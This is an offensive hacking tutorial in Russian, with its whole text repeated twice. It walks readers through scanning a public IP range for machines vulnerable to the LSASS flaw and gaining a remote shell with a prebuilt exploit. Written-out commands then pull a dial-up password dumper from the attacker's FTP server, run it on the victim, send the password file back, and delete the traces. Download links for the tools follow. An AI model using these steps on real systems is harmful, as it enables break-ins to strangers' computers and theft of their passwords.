Полный мануал по использованию LSASS уязвимости.
Начнём
Для нашего злого дела нам нужно всего три (четыре, если считать FTP сервер) программки - сканер на уязвимые машины – DSScan, очень полезная программулина SmallSoft Lsa Service Exploit, к сожалению, я не знаю автора думаю, он меня простит
(ссылки на весь нужный софт в конце статьи), и известная всем фриинетчикам прога dialupass2, показывающая все данные dialup (включая пароль).
Для охоты нам нужно выбрать диапазон IP адресов, возьмём мою любимую экву (57.66.158.1-57.66.158.255). В сканер Dsscan записываем Start IP 57.66.158.1 и End IP 57.66.158.255 - сканирование началось, внизу начали появляться Ip-шники, самый важный для нас столбец это “Status” – Not Vulnerable означает, что система не пропатчена или профаерволена, VLNERABLE – значит система уязвима, то что нам надо!
Теперь нужно атаковать удалённый комп, открываем SmallSoft Lsa Service Exploit , в строку IP-адрес вставляем скопированный нами IP , шелл порт оставляем как есть, тип атаки выбираем «Шелл» и нажимает кнопочку «НАЧАТЬ» Должно появиться что-то вроде этого:
Если вы увидели это, то атака прошла успешно. Спустя некоторое временя появиться ДОСовское окошко... Кто юзал Kaht2 могут дальше не читать, а кто новичок в этом деле – читайте дальше. Перед вами удалённая командная строка, теперь мы можем творить с этим компьютером всё, что захотим, но нам нужны пароли от dialup ...
Для начала создайте папочку Temp на диске D:\ или на каком вам удобно и киньте туда файлик dialupass2.exe прежде переименовав его в z.exe. Запускаем наш FTP сервер и заходим в раздел User Accounts. Нажимаем кнопку add () и в появившемся окошке вписываем имя пользователя (к примеру a) - нажимаем ok - дальше нам необходимо выбрать папку откуда будут закачивается и выкачиваться файлы – это и есть папка Temp, где лежит наш z.exe. Далее укажите пароль для этого пользователя (к примеру тоже a =)), расставьте все стрелки, кроме Allow delete и нажмите кнопку Update. После всех проделанных действий необходимо потестить как оно работает или нет. Нажимаем в вверху зеленую кнопку и переходим в раздел Server Log, если написано: “FTP server started on port 21” , то всё сконфигурировано удачно.
Теперь возвращаемся в удалённую командную строку и там пишем:
Cd \ [переходим в корневую директорию]
echo open xxx.xxx.xxx.xxx>go&&echo a>>go&&echo a>>go [где xxx.xxx.xxx.xxx – это ваш IP, этой командой мы создаём на диске C:\ удалённой машины файл go – он нужен для подключения к вашему ftp серверу]
ftp –s:go [подключаемся к ftp]
Проконтролировать подключение можно по логам FTP сервера. Ну и далее:
get z.exe
Этой командой мы закачали dialupass2 на удаленный компьютер. Теперь нам надо его запустить, пишем в консоли:
bye [отключаем свой удаленный компьютер от вашего FTP сервера и переходим снова в консоль] и
Этим мы запускаем dialupass на удаленном компьютере и все содержимое отчета выводим в соответствующую папку и в файл ps.html. Теперь нам только осталась забрать файл ps.html.
ftp –s:go [опять подключаемся к ftp со сценарием, находящимся в файле go]
send ps.html [этой командой мы отправляем с удалённого компа к себе на ftp файл, созданный dialupass2]
Смотрим Server Log - должна пойти закачка. После того как файл закачается пишем:
bye
del go [Удаляем следы с удаленного компьютера]
del z.exe
del ps.html
Вот и все, теперь у тебя в папке FTP сервера лежит файл ps.html, в нем находятся Dialup пароли.
Ссылки на нужный софт :
http://xarakiri.by.ru/Glob/pablos_ftp_server_v1_52.zip
http://xarakiri.by.ru/Glob/dialupass2.rar
http://www.securitylab.ru/tools/_services/download/?ID=45056
http://xakepy.ru/attachment.php?attachmentid=251
Начнём
Для нашего злого дела нам нужно всего три (четыре, если считать FTP сервер) программки - сканер на уязвимые машины – DSScan, очень полезная программулина SmallSoft Lsa Service Exploit, к сожалению, я не знаю автора думаю, он меня простит
(ссылки на весь нужный софт в конце статьи), и известная всем фриинетчикам прога dialupass2, показывающая все данные dialup (включая пароль).Для охоты нам нужно выбрать диапазон IP адресов, возьмём мою любимую экву (57.66.158.1-57.66.158.255). В сканер Dsscan записываем Start IP 57.66.158.1 и End IP 57.66.158.255 - сканирование началось, внизу начали появляться Ip-шники, самый важный для нас столбец это “Status” – Not Vulnerable означает, что система не пропатчена или профаерволена, VLNERABLE – значит система уязвима, то что нам надо!
Теперь нужно атаковать удалённый комп, открываем SmallSoft Lsa Service Exploit , в строку IP-адрес вставляем скопированный нами IP , шелл порт оставляем как есть, тип атаки выбираем «Шелл» и нажимает кнопочку «НАЧАТЬ» Должно появиться что-то вроде этого:
Если вы увидели это, то атака прошла успешно. Спустя некоторое временя появиться ДОСовское окошко... Кто юзал Kaht2 могут дальше не читать, а кто новичок в этом деле – читайте дальше. Перед вами удалённая командная строка, теперь мы можем творить с этим компьютером всё, что захотим, но нам нужны пароли от dialup ...
Для начала создайте папочку Temp на диске D:\ или на каком вам удобно и киньте туда файлик dialupass2.exe прежде переименовав его в z.exe. Запускаем наш FTP сервер и заходим в раздел User Accounts. Нажимаем кнопку add () и в появившемся окошке вписываем имя пользователя (к примеру a) - нажимаем ok - дальше нам необходимо выбрать папку откуда будут закачивается и выкачиваться файлы – это и есть папка Temp, где лежит наш z.exe. Далее укажите пароль для этого пользователя (к примеру тоже a =)), расставьте все стрелки, кроме Allow delete и нажмите кнопку Update. После всех проделанных действий необходимо потестить как оно работает или нет. Нажимаем в вверху зеленую кнопку и переходим в раздел Server Log, если написано: “FTP server started on port 21” , то всё сконфигурировано удачно.
Теперь возвращаемся в удалённую командную строку и там пишем:
Cd \ [переходим в корневую директорию]
echo open xxx.xxx.xxx.xxx>go&&echo a>>go&&echo a>>go [где xxx.xxx.xxx.xxx – это ваш IP, этой командой мы создаём на диске C:\ удалённой машины файл go – он нужен для подключения к вашему ftp серверу]
ftp –s:go [подключаемся к ftp]
Проконтролировать подключение можно по логам FTP сервера. Ну и далее:
get z.exe
Этой командой мы закачали dialupass2 на удаленный компьютер. Теперь нам надо его запустить, пишем в консоли:
bye [отключаем свой удаленный компьютер от вашего FTP сервера и переходим снова в консоль] и
Этим мы запускаем dialupass на удаленном компьютере и все содержимое отчета выводим в соответствующую папку и в файл ps.html. Теперь нам только осталась забрать файл ps.html.
ftp –s:go [опять подключаемся к ftp со сценарием, находящимся в файле go]
send ps.html [этой командой мы отправляем с удалённого компа к себе на ftp файл, созданный dialupass2]
Смотрим Server Log - должна пойти закачка. После того как файл закачается пишем:
bye
del go [Удаляем следы с удаленного компьютера]
del z.exe
del ps.html
Вот и все, теперь у тебя в папке FTP сервера лежит файл ps.html, в нем находятся Dialup пароли.
Ссылки на нужный софт :
http://xarakiri.by.ru/Glob/pablos_ftp_server_v1_52.zip
http://xarakiri.by.ru/Glob/dialupass2.rar
http://www.securitylab.ru/tools/_services/download/?ID=45056
http://xakepy.ru/attachment.php?attachmentid=251
